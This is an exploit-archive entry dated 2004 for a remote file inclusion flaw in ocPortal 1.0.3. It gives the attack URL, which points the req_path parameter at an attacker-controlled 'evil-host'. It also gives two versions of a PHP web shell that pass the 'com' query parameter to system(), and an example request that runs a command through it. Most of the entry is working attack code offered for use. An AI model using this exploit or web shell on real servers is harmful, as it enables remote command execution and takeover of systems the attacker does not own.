[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ocPortal 1.0.3 Remote File Inclusion
# Published : 2004-10-13
# Author : Exoduks
# Previous Title : WordPress Blog HTTP Splitting Vulnerability
# Next Title : Silent Storm Portal Multiple Vulnerabilities


http://localhost/ocp-103/index.php?req_path=http ://evil-host/



On your evil host you must put scipt funcs.php.

Example of funcs.php if your host doesn't support php.



   <?php

     $com = $_GET["com"];

     system ("$com");

   ?>



  Example of funcs.php if your host support php.



   <?php

     echo '<?php $com = $_GET["com"]; system ("$com"); ?>';

   ?>



  http://localhost/ocp-103/index.php?req_path=http://evil-host/&com=ls


# www.Syue.com [2004-10-13]